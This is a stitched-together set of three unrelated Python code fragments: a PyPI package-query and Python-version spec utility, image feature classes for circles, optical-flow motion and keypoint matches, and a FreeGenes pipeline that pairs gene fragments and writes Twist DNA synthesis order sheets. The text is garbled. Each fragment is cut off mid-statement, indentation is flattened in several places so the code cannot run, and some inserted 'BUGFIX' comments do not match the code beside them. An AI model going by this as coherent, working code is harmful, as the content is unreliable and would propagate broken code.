    RR_PYPI = re.compile(r"([^a-z\d-]+|--+)", re.IGNORECASE)
    # Runs of chars not allowed in a wheel basename, to collapse into a single underscore (std_wheel_basename)
    RR_WHEEL = re.compile(r"[^a-z\d.]+", re.IGNORECASE)
    # href links pointing at .tar.gz/.whl artifacts (as found in a pypi simple index html page)
    RX_HREF = re.compile(r'href=".+/([^/#]+\.(tar\.gz|whl))#', re.IGNORECASE)
    # Source distribution basename: <name>-<version>.tar.gz
    RX_SDIST = re.compile(r"^([a-z][\w.-]*[a-z\d])-(\d[\w.!+-]*)\.tar\.gz$", re.IGNORECASE)
    # Wheel basename: <name>-<version>[-<build>]-<tags>.whl
    RX_WHEEL = re.compile(r"^([a-z][\w.]*[a-z\d])-(\d[\w.!+]*)(-(\d[\w.]*))?-(.*)\.whl$", re.IGNORECASE)
    # Default REST endpoint queried by pypi_response(); '{name}' is replaced by the standardized package name
    DEFAULT_PYPI_URL = "https://pypi.org/pypi/{name}/json"
    # Lazily initialized by default_pypi_client()
    _pypi_client = None
@classmethod
def is_acceptable(cls, name):
"""Is 'name' an acceptable pypi package name?"""
return bool(isinstance(name, str) and name != "UNKNOWN" and cls.RX_ACCEPTABLE_PACKAGE_NAME.match(name))
@classmethod
def std_package_name(cls, name):
"""Standardized pypi package name, single dashes and alpha numeric chars allowed only"""
if cls.is_acceptable(name):
dashed = cls.RR_PYPI.sub("-", name).lower()
return cls.RR_PYPI.sub("-", dashed) # 2nd pass to ensure no `--` remains
@classmethod
def std_wheel_basename(cls, name):
"""Standardized wheel file base name, single underscores, dots and alpha numeric chars only"""
if cls.is_acceptable(name):
return cls.RR_WHEEL.sub("_", name)
@classmethod
def default_pypi_client(cls):
"""
Returns:
(RestClient): Default client to use to query pypi
"""
if cls._pypi_client is None:
cls._pypi_client = RestClient()
return cls._pypi_client
@classmethod
def pypi_response(cls, package_name, client=None, index=None, fatal=False, logger=False):
"""See https://warehouse.pypa.io/api-reference/json/
Args:
package_name (str): Pypi package name
client (RestClient | None): Optional custom pypi client to use
index (str | None): Optional custom pypi index url
fatal (type | bool | None): True: abort execution on failure, False: don't abort but log, None: don't abort, don't log
logger (callable | bool | None): Logger to use, True to print(), False to trace(), None to disable log chatter
Returns:
(dict | str | None): Dict if we queried actual REST endpoint, html text otherwise (legacy pypi simple)
"""
pypi_name = cls.std_package_name(package_name)
if not pypi_name:
return None
if client:
if not index:
index = client.base_url
else:
client = cls.default_pypi_client()
if not index:
index = cls.DEFAULT_PYPI_URL
if "{name}" in index:
url = index.format(name=pypi_name)
else:
url = urljoin(index, "%s/" % pypi_name)
r = client.get_response(url, fatal=fatal, logger=logger)
if r and r.ok:
text = (r.text or "").strip()
if text.startswith("{"):
return json.loads(text)
return text
@classmethod
def latest_pypi_version(cls, package_name, client=None, index=None, include_prerelease=False, fatal=False, logger=False):
"""
Args:
package_name (str): Pypi package name
client (RestClient | None): Optional custom pypi client to use
index (str | None): Optional custom pypi index url
include_prerelease (bool): If True, include pre-releases
fatal (type | bool | None): True: abort execution on failure, False: don't abort but log, None: don't abort, don't log
logger (callable | bool | None): Logger to use, True to print(), False to trace(), None to disable log chatter
Returns:
(Version | None): Latest version, if any
"""
response = cls.pypi_response(package_name, client=client, index=index, fatal=fatal, logger=logger)
if response:
if isinstance(response, dict):
info = response.get("info")
if isinstance(info, dict) and not info.get("yanked"): # Not sure if this can ever happen
version = Version(info.get("version"))
if version.is_valid and (include_prerelease or not version.prerelease):
return version
versions = sorted(x.version for x in cls._versions_from_pypi(response.get("releases")))
else:
versions = sorted(i.version for i in cls._parsed_legacy_html(response))
if not include_prerelease:
candidates = [v for v in versions if v.is_valid and not v.prerelease]
if candidates:
versions = candidates
if versions:
return versions[-1]
@classmethod
def ls_pypi(cls, package_name, client=None, index=None, source=None, fatal=False, logger=False):
"""
Args:
package_name (str): Pypi package name
client (RestClient | None): Optional custom pypi client to use
index (str | None): Optional custom pypi index url
source: Optional arbitrary object to track provenance of ArtifactInfo
fatal (type | bool | None): True: abort execution on failure, False: don't abort but log, None: don't abort, don't log
logger (callable | bool | None): Logger to use, True to print(), False to trace(), None to disable log chatter
Returns:
(list[ArtifactInfo] | None): Artifacts reported by pypi mirror
"""
response = cls.pypi_response(package_name, client=client, index=index, fatal=fatal, logger=logger)
if isinstance(response, dict):
yield from cls._versions_from_pypi(response.get("releases"), source=source)
elif response:
yield from cls._parsed_legacy_html(response, source=source)
@classmethod
def _versions_from_pypi(cls, releases, source=None):
if isinstance(releases, dict):
for v, infos in releases.items():
for info in infos:
if not info.get("yanked"):
info = ArtifactInfo.from_basename(info.get("filename"), source=source)
if info:
yield info
@classmethod
def _parsed_legacy_html(cls, text, source=None):
"""
Args:
text (str): Text as received from a legacy pypi server
source: Optional arbitrary object to track provenance of ArtifactInfo
Yields:
(ArtifactInfo): Extracted information
"""
if text:
lines = text.strip().splitlines()
if lines and "does not exist" not in lines[0]:
for line in lines:
m = cls.RX_HREF.search(line)
if m:
info = ArtifactInfo.from_basename(m.group(1), source=source)
if info:
yield info
class PythonSpec:
"""
Holds a canonical reference to a desired python installation
Examples: 3, 3.9, py39, conda3.7.1, /usr/bin/python
Scanned pythons have a full spec of the form: 'cpython:3.9.2'
Desired pythons are typically partial (like: 'py39', turned into canonical 'cpython:3.9')
`PythonDepot` can then search for pythons satisfying the partial specs given
"""
family = None
is_min_spec = ""
version = None
def __init__(self, text, family=None):
    """
    Args:
        text: Text describing desired python (note: an empty or None `text` will yield a generic "cpython:" spec)
        family (str | None): Additional text to examine to determine python family
    """
    text = stringified(text, none="").strip()
    self.text = text
    # Empty text or "invoker" refers to the python currently running this code
    if not text or text == "invoker":
        self.family = guess_family(family or sys.version)
        self.canonical = "invoker"
        self.version = get_current_version()
        return

    # A path-like text refers directly to a python installation on disk
    if _is_path(text):
        self.family = guess_family(family or text)
        self.canonical = resolved_path(text)
        return

    # Try full spec first (e.g. 'cpython:3.9'), then family-only (e.g. 'py')
    # NOTE(review): assumes R_SPEC group 1 is the family part and group 3 the
    # version part -- confirm against the R_SPEC definition
    m = R_SPEC.match(text)
    if not m:
        m = R_FAMILY.match(text)
        if m:
            # Family-only spec, no version (canonical like "cpython:")
            self.family = guess_family(family or m.group(1))
            self.canonical = "%s:" % self.family

        else:
            # Unrecognized: mark canonical with a leading "?"
            self.canonical = "?%s" % text

        return

    version_text = m.group(3)
    # Trailing "+" means "this version or higher"
    if version_text and version_text.endswith("+"):
        self.is_min_spec = "+"
        version_text = version_text[:-1]

    if version_text:
        # Shorthand like "39" is expanded to "3.9"
        if len(version_text) > 1 and "." not in version_text:
            version_text = "%s.%s" % (version_text[0], version_text[1:])

        self.version = Version.from_text(version_text, strict=True)

    if self.version:
        self.family = guess_family(family or m.group(1))
        self.canonical = "%s:%s%s" % (self.family, self.version or "", self.is_min_spec)

    else:
        # Version text present but unparsable: unrecognized spec
        self.canonical = "?%s" % text
def __repr__(self):
    """Shortened canonical form of this spec."""
    canonical = self.canonical
    return short(canonical)
def __hash__(self):
    """Specs hash by their canonical form (consistent with __eq__)."""
    key = self.canonical
    return hash(key)
def __eq__(self, other):
    """Two specs are equal when their canonical forms match."""
    if not isinstance(other, PythonSpec):
        return False
    return self.canonical == other.canonical
def __lt__(self, other):
if isinstance(other, PythonSpec):
if self.version is None or other.version | |
the feature.
**EXAMPLE**
>>> img = Image("lenna")
>>> kp = img.findKeypoints()
>>> c = kp[0].meanColor()
"""
#generate the mask
if( self._avgColor is None):
mask = self.image.getEmpty(1)
cv.Zero(mask)
cv.Circle(mask,(int(self.x),int(self.y)),int(self._r),color=(255,255,255),thickness=-1)
temp = cv.Avg(self.image.getBitmap(),mask)
self._avgColor = (temp[0],temp[1],temp[2])
return self._avgColor
def colorDistance(self, color = (0, 0, 0)):
    """
    Return the euclidean color distance of the color tuple at x,y from a given color (default black)
    """
    target = np.array(color)
    mine = np.array(self.meanColor())
    return spsd.euclidean(target, mine)
def perimeter(self):
    """
    **SUMMARY**
    Returns the perimeter (circumference) of the circle feature in pixels.
    """
    circumference = 2*pi*self._r
    return circumference
def width(self):
    """
    **SUMMARY**
    Returns the width of the feature -- for a circle this is simply r*2.
    """
    full_extent = self._r*2
    return full_extent
def height(self):
    """
    **SUMMARY**
    Returns the height of the feature -- for a circle this is simply r*2.
    """
    full_extent = self._r*2
    return full_extent
def radius(self):
    """
    **SUMMARY**
    Returns the radius of the circle in pixels.
    """
    r = self._r
    return r
def diameter(self):
    """
    **SUMMARY**
    Returns the diameter of the circle in pixels.
    """
    d = self._r*2
    return d
def crop(self,noMask=False):
    """
    **SUMMARY**
    This function returns the largest bounding box for an image.
    **PARAMETERS**
    * *noMask* - if noMask=True we return the bounding box image of the circle.
      if noMask=False (default) we return the masked circle with the rest of the area set to black
    **RETURNS**
    The masked circle image.
    """
    if( noMask ):
        # Plain axis-aligned crop around the circle center, no masking
        return self.image.crop(self.x, self.y, self.width(), self.height(), centered = True)
    else:
        # Build a single-channel circular mask, blit the source through it,
        # then crop the result down to the circle's bounding box.
        mask = self.image.getEmpty(1)
        result = self.image.getEmpty()
        cv.Zero(mask)
        cv.Zero(result)
        #if you want to shave a bit of time we go do the crop before the blit
        cv.Circle(mask,(int(self.x),int(self.y)),int(self._r),color=(255,255,255),thickness=-1)
        cv.Copy(self.image.getBitmap(),result,mask)
        retVal = Image(result)
        retVal = retVal.crop(self.x, self.y, self.width(), self.height(), centered = True)
        return retVal
######################################################################
class Motion(Feature):
    """
    **SUMMARY**
    The motion feature is used to encapsulate optical flow vectors. The feature
    holds the length and direction of the vector.
    """
    x = 0.0
    y = 0.0
    image = ""  # parent image
    points = []
    dx = 0.00
    dy = 0.00
    norm_dy = 0.00
    norm_dx = 0.00
    window = 7

    def __init__(self, i, at_x, at_y, dx, dy, wndw):
        """
        i - the source image.
        at_x - the sample x pixel position on the image.
        at_y - the sample y pixel position on the image.
        dx - the x component of the optical flow vector.
        dy - the y component of the optical flow vector.
        wndw - the size of the sample window (we assume it is square).
        """
        self.dx = dx  # the direction of the vector
        self.dy = dy
        self.window = wndw  # the size of the sample window
        sz = wndw/2
        # Corners of the sample window, centered on the flow sample point.
        # BUGFIX: the third corner was a duplicate of the first ((at_x+sz, at_y+sz)),
        # leaving the window polygon degenerate; it should be the opposite corner.
        points = [(at_x+sz,at_y+sz),(at_x-sz,at_y+sz),(at_x-sz,at_y-sz),(at_x+sz,at_y-sz)]
        super(Motion, self).__init__(i, at_x, at_y, points)

    def draw(self, color = Color.GREEN, width=1, normalize=True):
        """
        **SUMMARY**
        Draw the optical flow vector going from the sample point along the length of the motion vector.
        **PARAMETERS**
        * *color* - An RGB color triplet.
        * *width* - if width is less than zero we draw the feature filled in, otherwise we draw the
          contour using the specified width.
        * *normalize* - normalize the vector size to the size of the block (i.e. the biggest optical flow
          vector is scaled to the size of the block, all other vectors are scaled relative to
          the longest vector.
        **RETURNS**
        Nothing - this is an inplace operation that modifies the source images drawing layer.
        """
        new_x = 0
        new_y = 0
        if( normalize ):
            # Scale the normalized components to the half-window diagonal
            win = self.window/2
            w = math.sqrt((win*win)*2)
            new_x = (self.norm_dx*w) + self.x
            new_y = (self.norm_dy*w) + self.y
        else:
            new_x = self.x + self.dx
            new_y = self.y + self.dy

        self.image.dl().line((self.x,self.y),(new_x,new_y),color,width)

    def normalizeTo(self, max_mag):
        """
        **SUMMARY**
        This helper method normalizes the vector give an input magnitude.
        This is helpful for keeping the flow vector inside the sample window.
        """
        if( max_mag == 0 ):
            # Avoid division by zero: a zero maximum means every vector normalizes to zero
            self.norm_dx = 0
            self.norm_dy = 0
            return None
        mag = self.magnitude()
        new_mag = mag/max_mag
        unit = self.unitVector()
        self.norm_dx = unit[0]*new_mag
        self.norm_dy = unit[1]*new_mag

    def magnitude(self):
        """
        Returns the magnitude of the optical flow vector.
        """
        # Use math.sqrt for consistency with draw() above
        return math.sqrt((self.dx*self.dx)+(self.dy*self.dy))

    def unitVector(self):
        """
        Returns the unit vector direction of the flow vector as an (x,y) tuple.
        """
        mag = self.magnitude()
        if( mag != 0.00 ):
            return (float(self.dx)/mag,float(self.dy)/mag)
        else:
            # Zero-length vector has no direction
            return (0.00,0.00)

    def vector(self):
        """
        Returns the raw direction vector as an (x,y) tuple.
        """
        return (self.dx,self.dy)

    def windowSz(self):
        """
        Return the window size that we sampled over.
        """
        return self.window

    def meanColor(self):
        """
        Return the color tuple from x,y
        **SUMMARY**
        Return a numpy array of the average color of the area covered by each Feature.
        **RETURNS**
        Returns an array of RGB triplets the correspond to the mean color of the feature.
        **EXAMPLE**
        >>> img = Image("lenna")
        >>> kp = img.findKeypoints()
        >>> c = kp.meanColor()
        """
        # Average the color over the sample window centered on (x, y)
        x = int(self.x-(self.window/2))
        y = int(self.y-(self.window/2))
        return self.image.crop(x,y,int(self.window),int(self.window)).meanColor()

    def crop(self):
        """
        This function returns the image in the sample window around the flow vector.
        Returns Image
        """
        x = int(self.x-(self.window/2))
        y = int(self.y-(self.window/2))
        return self.image.crop(x,y,int(self.window),int(self.window))
######################################################################
class KeypointMatch(Feature):
    """
    This class encapsulates a keypoint match between images of an object.
    It is used to record a template of one image as it appears in another image
    """
    x = 0.00
    y = 0.00
    image = ""  # parent image
    points = []
    _minRect = []
    _avgColor = None
    _homography = []
    _template = None

    def __init__(self, image, template, minRect, _homography):
        """
        image - the image the match was found in.
        template - the template image that was matched.
        minRect - the minimum bounding rectangle of the match, as (x,y) tuples.
        _homography - the homography matrix mapping the template into the image.
        """
        self._template = template
        self._minRect = minRect
        self._homography = _homography
        # Compute the axis-aligned bounding box of the (possibly rotated) minRect
        xmax = 0
        ymax = 0
        xmin = image.width
        ymin = image.height
        for p in minRect:
            if( p[0] > xmax ):
                xmax = p[0]
            if( p[0] < xmin ):
                xmin = p[0]
            if( p[1] > ymax ):
                ymax = p[1]
            if( p[1] < ymin ):
                ymin = p[1]

        width = (xmax-xmin)
        height = (ymax-ymin)
        at_x = xmin + (width/2)
        at_y = ymin + (height/2)
        points = [(xmin,ymin),(xmin,ymax),(xmax,ymax),(xmax,ymin)]
        super(KeypointMatch, self).__init__(image, at_x, at_y, points)

    def draw(self, color = Color.GREEN, width=1):
        """
        The default drawing operation is to draw the min bounding
        rectangle in an image.
        **PARAMETERS**
        * *color* - An RGB color triplet.
        * *width* - if width is less than zero we draw the feature filled in, otherwise we draw the
          contour using the specified width.
        **RETURNS**
        Nothing - this is an inplace operation that modifies the source images drawing layer.
        """
        self.image.dl().line(self._minRect[0],self._minRect[1],color,width)
        self.image.dl().line(self._minRect[1],self._minRect[2],color,width)
        self.image.dl().line(self._minRect[2],self._minRect[3],color,width)
        self.image.dl().line(self._minRect[3],self._minRect[0],color,width)

    def drawRect(self, color = Color.GREEN, width=1):
        """
        This method draws the axes alligned square box of the template
        match. This box holds the minimum bounding rectangle that describes
        the object. If the minimum bounding rectangle is axes aligned
        then the two bounding rectangles will match.
        """
        self.image.dl().line(self.points[0],self.points[1],color,width)
        self.image.dl().line(self.points[1],self.points[2],color,width)
        self.image.dl().line(self.points[2],self.points[3],color,width)
        self.image.dl().line(self.points[3],self.points[0],color,width)

    def crop(self):
        """
        Returns a cropped image of the feature match. This cropped version is the
        axes aligned box masked to just include the image data of the minimum bounding
        rectangle.
        """
        # BUGFIX: TL was referenced without being defined (NameError); fetch the
        # top-left corner the same way meanColor() does
        TL = self.topLeftCorner()
        raw = self.image.crop(TL[0],TL[1],self.width(),self.height())  # crop the minbounding rect
        return raw

    def meanColor(self):
        """
        return the average color within the minimum bounding rectangle
        **RETURNS**
        Returns an array of RGB triplets the correspond to the mean color of the feature.
        **EXAMPLE**
        >>> img = Image("lenna")
        >>> kp = img.findKeypoints()
        >>> c = kp.meanColor()
        """
        if( self._avgColor is None ):
            TL = self.topLeftCorner()
            # BUGFIX: was crop(TL[0], TL[0], ...) -- the y coordinate used the x value
            raw = self.image.crop(TL[0],TL[1],self.width(),self.height())  # crop the minbounding rect
            mask = Image((self.width(),self.height()))
            # BUGFIX: TRUE is not defined in Python; use True
            mask.dl().polygon(self._minRect,color=Color.WHITE,filled=True)
            mask = mask.applyLayers()
            retVal = cv.Avg(raw.getBitmap(),mask._getGrayscaleBitmap())
            self._avgColor = retVal  # cache for subsequent calls
        else:
            retVal = self._avgColor
        return retVal

    def getMinRect(self):
        """
        Returns the minimum bounding rectangle of the feature as a list
        of (x,y) tuples.
        """
        return self._minRect

    def getHomography(self):
        """
        Returns the _homography matrix used to calulate the minimum bounding
        rectangle.
        """
        return self._homography
######################################################################
"""
Create a shape context descriptor.
"""
class ShapeContextDescriptor(Feature):
x = 0.00
y = 0.00
image = "" #parent image
points = []
_minRect = []
_avgColor = None
_descriptor = None
_sourceBlob = None
def __init__(self, image,point,descriptor,blob):
self._descriptor = descriptor
self._sourceBlob = blob
x = point[0]
y | |
data["info"]["gene_metadata"]["cloning"]["cloning_enzyme"] == "BtgZI":
ortho_pair = get_pair(data["gene_id"])
fragments = FG_standard_fragment(data["sequence"]["optimized_sequence"],part_type,data["info"]["gene_metadata"]["cloning"]["cloning_enzyme"], ortho_pair)
print(fragments)
print(data["gene_id"])
gene_id = data["gene_id"]
for index,frag in enumerate(fragments):
fragment_name = gene_id + "_" + str(index + 1)
data["sequence"]["fragment_sequences"][fragment_name] = frag
path = "{}{}".format(stage,gene_id)
with open("{}/{}.json".format(path,gene_id),"w+") as json_file:
json.dump(data,json_file,indent=2)
def order_write_link():
    """Pair small (BtgZI) fragments with large (BbsI) fragments into joined
    synthesis sequences and write the pairings back into the staged gene files.

    # NOTE(review): small_seq_ids / small_seqs / large_seq_ids / large_seqs and
    # stage appear to come from the enclosing scope -- confirm the lists are
    # empty before this runs, or pairs will accumulate across calls.
    """
    # Collect staged fragments, split by cloning enzyme
    for file in glob.glob(stage + "*/*.json"):
        with open(file,"r") as json_file:
            data = json.load(json_file)
        # Fragment the genes
        # Begin query
        if data["info"]["gene_metadata"]["cloning"]["cloning_enzyme"] == "BtgZI":
            small_seq_ids.append(data["gene_id"])
            small_seqs.append(data["sequence"]["fragment_sequences"]["{}_1".format(data["gene_id"])])
        elif data["info"]["gene_metadata"]["cloning"]["cloning_enzyme"] == "BbsI":
            print("Num frags: ",len(data["sequence"]["fragment_sequences"]))
            # Only single-fragment BbsI genes are eligible for linking
            if len(data["sequence"]["fragment_sequences"]) > 1:
                print("too many frags")
                continue
            large_seq_ids.append(data["gene_id"])
            large_seqs.append(data["sequence"]["fragment_sequences"]["{}_1".format(data["gene_id"])])
    # Generate dataframes that are sorted in opposite directions based on length
    # which pairs the smallest large fragment with the largest small fragment
    small_df = pd.DataFrame({
        "Gene ID" : small_seq_ids,
        "Sequence" : small_seqs,
        "Length" : [len(seq) for seq in small_seqs]
    })
    small_df = small_df.sort_values("Length",ascending=False)
    large_df = pd.DataFrame({
        "Gene ID" : large_seq_ids,
        "Sequence" : large_seqs,
        "Length" : [len(seq) for seq in large_seqs]
    })
    large_df = large_df.sort_values("Length")
    small_counter = 0
    print("Total small sequences: ",len(small_df))
    ## ====================================================
    ## Join Fragments
    ## ====================================================
    joined_seqs = []
    joined_ids = []
    fragment_names = []
    # Pair sequences together until it runs out of either type of sequence
    for index,row in large_df.iterrows():
        print("small counter: ",small_counter)
        if len(small_df) == small_counter:
            print("ran out of small")
            break
        small_row = small_df.iloc[small_counter]
        # repeat_check guards against problematic (repetitive) joined sequences;
        # on failure the small fragment is retried with the next large one
        if repeat_check(row["Sequence"] + small_row["Sequence"]):
            joined_seq = row["Sequence"] + small_row["Sequence"]
            # The joined sequence is recorded twice -- once under each member
            # gene id -- so that both gene files are updated below
            joined_ids.append(row["Gene ID"])
            joined_seqs.append(joined_seq)
            fragment_names.append(row["Gene ID"] + "_link_" + small_row["Gene ID"])
            joined_ids.append(small_row["Gene ID"])
            joined_seqs.append(joined_seq)
            fragment_names.append(row["Gene ID"] + "_link_" + small_row["Gene ID"])
            small_counter += 1
        else:
            print(row["Gene ID"] + " AND " + small_row["Gene ID"])
    joined_df = pd.DataFrame({
        "Gene ID" : joined_ids,
        "Sequence" : joined_seqs,
        "Fragment Name" : fragment_names
    })
    # Change the files in the database to reflect the joined sequences
    for index,row in joined_df.iterrows():
        with open("{}{}/{}.json".format(stage,row["Gene ID"],row["Gene ID"]),"r") as json_file:
            data = json.load(json_file)
        # Existing fragments are replaced wholesale by the joined fragment
        data["sequence"]["fragment_sequences"] = {}
        data["sequence"]["fragment_sequences"][row["Fragment Name"]] = row["Sequence"]
        with open("{}{}/{}.json".format(stage,row["Gene ID"],row["Gene ID"]),"w+") as json_file:
            json.dump(data,json_file,indent=2)
def order_twist_order():
    """Collect all staged BbsI fragment sequences, stamp them with the next
    submission number, and write a Twist-format submission CSV.

    Prompts the user for the submission number; writes submissionNNN.csv under
    ../submissions/ and updates each gene json with its order number.
    """
    next_sub_num = input("Next submission number : ")
    ## Find all of the sequences that have yet to be ordered
    will_order = []
    will_order_seqs = []
    for file in glob.glob("{}*/*.json".format(stage)):
        with open(file,"r") as json_file:
            data = json.load(json_file)
        # Excludes sequences that have already been ordered and small sequences
        # that haven't been paired yet
        # Only pulls the sequence to order from the large fragment
        if data["info"]["gene_metadata"]["cloning"]["cloning_enzyme"] == "BbsI":
            for fragment in data["sequence"]["fragment_sequences"]:
                print("fragment",fragment)
                will_order.append(fragment)
                will_order_seqs.append(data["sequence"]["fragment_sequences"][fragment])
            # Record which submission this gene went out in
            data["info"]["order_number"] = int(next_sub_num)
            with open(file,"w+") as json_file:
                json.dump(data,json_file,indent=2)
    # Output DNA in Twist order format
    twist_dna = pd.DataFrame({
        'gene name': will_order,
        'FASTA_seq': will_order_seqs,
    }, columns=['gene name','FASTA_seq'])
    # (removed an unused `previous_submissions` glob that had no effect)
    twist_dna.to_csv('{}/submissions/submission{}.csv'.format("./..",str(next_sub_num).zfill(3)),index=False)
    print("Completed submission form.")
def order_replace_bad_sequence(gene_id):
    """Interactively substitute part of a gene's optimized sequence, re-run
    fix_sequence, and persist the result only if the protein translation is
    unchanged. Loops (recursively) on bad translations and offers to repeat
    for further genes.
    """
    table = codon.load_codon_table(taxonomy_id="custom_1", custom=True)
    json_data = Json_load(stage + "{}/{}.json".format(gene_id,gene_id))
    seq_to_replace = input("Sequence to replace? ")
    new_seq = input("New sequence? ")
    old_sequence = json_data["sequence"]["optimized_sequence"]
    new_sequence = fix_sequence(table,gene_id,old_sequence.replace(seq_to_replace, new_seq),0,[])
    # The edit must be silent at the protein level
    if not Seq(old_sequence, IUPAC.unambiguous_dna).translate() == Seq(new_sequence, IUPAC.unambiguous_dna).translate():
        print("Bad translation, try again")
        # BUGFIX: was `replace_bad_sequence(gene_id)`, an undefined name at this
        # scope; recurse into this function (matching order_reoptimize_fragment's
        # self-call pattern)
        order_replace_bad_sequence(gene_id)
    else:
        # Keep the genbank record in sync with the json record
        with open(stage + "{}/{}.gb".format(gene_id,gene_id),"r") as genbank_single:
            genbank_current = genbank_single.read()
        genbank_fixed = replace_genbank_sequence(genbank_current, new_sequence)
        with open(stage + "{}/{}.gb".format(gene_id,gene_id),"w+") as genbank_single:
            genbank_single.write(genbank_fixed)
        json_data["sequence"]["optimized_sequence"] = new_sequence
        with open(stage + "{}/{}.json".format(gene_id,gene_id),"w+") as json_file:
            json.dump(json_data,json_file,indent=2)
        print("Wrote new sequence for " + gene_id)
        if input("Replace another sequence? Y or N : ").upper() == "Y":
            new_gene_id = input("gene id : ")
            # BUGFIX: was `replace_bad_sequence(new_gene_id)` (undefined)
            return order_replace_bad_sequence(new_gene_id)
        else:
            order_fragment_to_order()
def order_reoptimize_fragment(gene_id):
    """Re-run codon optimization on a staged gene's protein translation and
    persist the new DNA sequence (json + genbank) if the translation is
    preserved; retries recursively on a bad translation.
    """
    json_data = Json_load(stage + "{}/{}.json".format(gene_id,gene_id))
    table = codon.load_codon_table(taxonomy_id="custom_1", custom=True)
    # Translate the current sequence, dropping the trailing stop ([:-1])
    translation = Seq(json_data["sequence"]["optimized_sequence"], IUPAC.unambiguous_dna).translate()[:-1]
    #translation = json_data["genbank"]["translation"]
    # Re-optimize from the protein and re-append a TGA stop codon
    new_sequence = fix_sequence(table,gene_id,codon.optimize_protein(table, translation) + "TGA")
    # The optimization must be silent at the protein level
    if not Seq(json_data["sequence"]["optimized_sequence"], IUPAC.unambiguous_dna).translate() == Seq(new_sequence, IUPAC.unambiguous_dna).translate():
        print("Bad translation, try again")
        order_reoptimize_fragment(gene_id)
    else:
        # Keep the genbank record in sync with the json record
        with open(stage + "{}/{}.gb".format(gene_id,gene_id),"r") as genbank_single:
            genbank_current = genbank_single.read()
        genbank_fixed = replace_genbank_sequence(genbank_current, new_sequence)
        with open(stage + "{}/{}.gb".format(gene_id,gene_id),"w+") as genbank_single:
            genbank_single.write(genbank_fixed)
        json_data["sequence"]["optimized_sequence"] = new_sequence
        with open(stage + "{}/{}.json".format(gene_id,gene_id),"w+") as json_file:
            json.dump(json_data,json_file,indent=2)
        print("Wrote new sequence for " + gene_id)
def order_reset_fragment_stage():
    """Blank out the fragment_sequences table in every staged gene json file."""
    for json_path in glob.glob(stage + "*/*.json"):
        with open(json_path,"r") as handle:
            record = json.load(handle)
        record["sequence"]["fragment_sequences"] = {}
        gene_id = record["gene_id"]
        gene_dir = "{}{}".format(stage,gene_id)
        with open("{}/{}.json".format(gene_dir,gene_id),"w+") as handle:
            json.dump(record,handle,indent=2)
    print("Fragments on stage cleared.")
def order_id_reset():
    """Advance the global ID counter past every gene currently on stage and bump
    the collection number, persisting both to the FreeGene config file.

    # NOTE(review): `config` and `stage` appear to come from the enclosing
    # scope -- confirm config was loaded before this runs.
    """
    number_of_files = len(glob.glob(stage + "*"))
    input("Are you sure you'd like to continue? (ENTER TO CONTINUE)")
    original_number = config["ID_START"]
    # Skip past one ID per staged gene directory
    new_number = config["ID_START"] + number_of_files
    config["ID_START"] = new_number
    # Collection reset
    config["LAST_COLLECTION"] = config["LAST_COLLECTION"] + 1
    with open("./configuration/FreeGene_config.yaml","w+") as yaml_file:
        yaml.dump(config,yaml_file,default_flow_style=False)
    print("Replaced {} with {}. New collection number start is {}".format(original_number,new_number,config["LAST_COLLECTION"]))
def order_fragment_to_order():
    """Run the full staging pipeline: clear staged fragments, re-fragment the
    staged genes, write linker pairings, then produce a Twist submission sheet.
    """
    print("Recreating database")
    order_reset_fragment_stage()
    order_fragment_genes()
    order_write_link()
    order_twist_order()
def order_manager():
    """Interactive menu for FreeGenes ordering tasks; re-enters itself after
    each action until the user exits or returns to the FG manager.
    """
    print("\n")
    print("=== FreeGenes Order manager ===")
    # BUGFIX: "Reurn" typo corrected to "Return" (both here and in the match below)
    options = ("Frag -> Order", "Set ID starting point", "Fragment genes in stage", "Write linkers to stage", "Create Twist submission spreadsheet", "Change part of sequence", "Reoptimize single fragment", "Reset fragment stage", "Clear ortho pairs","Bad seq removal", "Return to FG manager", "Exit")
    choice = option_list(options)
    if choice == "Frag -> Order":
        order_fragment_to_order()
    elif choice == "Set ID starting point":
        order_id_reset()
    elif choice == "Fragment genes in stage":
        order_fragment_genes()
    elif choice == "Write linkers to stage":
        order_write_link()
    elif choice == "Create Twist submission spreadsheet":
        order_twist_order()
    elif choice == "Change part of sequence":
        # BUGFIX: was `replace_bad_sequence(...)` -- the helper defined above is
        # order_replace_bad_sequence
        order_replace_bad_sequence(input("gene_id : "))
    elif choice == "Reoptimize single fragment":
        # BUGFIX: was `reoptimize_fragment(...)` -- the helper defined above is
        # order_reoptimize_fragment
        order_reoptimize_fragment(input("gene_id : "))
    elif choice == "Reset fragment stage":
        order_reset_fragment_stage()
    elif choice == "Bad seq removal":
        order_bad_seq()
    elif choice == "Return to FG manager":
        return freegenes_manager()
    elif choice == "Exit":
        sys.exit()
    elif choice == "Clear ortho pairs":
        clear_pairs()
    print("Returning to Order manager")
    return order_manager()
order_manager()
### ===============
### ===============
### GENOME DIGESTER
### ===============
### ===============
def freegenes_digest():
## ===============
## SETUP VARIABLES
## ===============
date = datetime.date.today().strftime("%d") + "-" + datetime.date.today().strftime("%B")[:3].upper() + "-" + datetime.date.today().strftime("%Y")
stage = FreeGenes_configuration()["STAGE_PATH"]
NextCollection = NextCollection()
unused = set()
prefix_genbank = """LOCUS {} {} bp ds-DNA linear BCT {}
DEFINITION {}
ACCESSION .
VERSION .
KEYWORDS .
REFERENCE 1 (bases 1 to {})
SOURCE synthetic DNA sequence
ORGANISM {}
AUTHORS {}
TITLE Direct Submission
FEATURES Location/Qualifiers
CDS {}"""
important_tags = important_tags
for file in glob.glob("./../pipeline/template.json"):
with open(file,"r") as template_json:
template = json.load(template_json)
## ================
## Digest functions
## ================
# Process a string of important values into a dictionary
def dictionary_builder(tag_list, string):
    """Map each tag in tag_list to the concatenated values of its /tag="value"
    qualifiers found in the feature string ('' when the tag is absent)."""
    pattern = r'/{}=\"([A-Za-z0-9:_./-_\s-]+)\"'
    return {tag: ''.join(re.findall(pattern.format(tag), string)) for tag in tag_list}
# Build dictionary into genbank compatible format
def dictionary_to_genbank(dictionary):
    """Convert a tag->value dict into genbank qualifier strings (key="value"),
    skipping non-string values (e.g. the references list)."""
    value_list = []
    for key, value in dictionary.items():
        # isinstance is the idiomatic (and subclass-safe) replacement for
        # the original `type(value) == type("")` check
        if isinstance(value, str):
            value_list.append(str(key + "=" + '"' + value + '"'))
    return value_list
def genbank_multiline(genbank_list):
    """Wrap each qualifier string to 58 columns and emit one indented
    /qualifier line per wrapped chunk, newline-terminated."""
    multiline = ''
    for entry in genbank_list:
        # Renamed the inner loop variable (the original shadowed the outer `item`)
        for chunk in textwrap.wrap(entry, width=58):
            multiline = multiline + " " + "/" + chunk + "\n"
    return multiline
def fasta_refseq_dictionary(file_name):
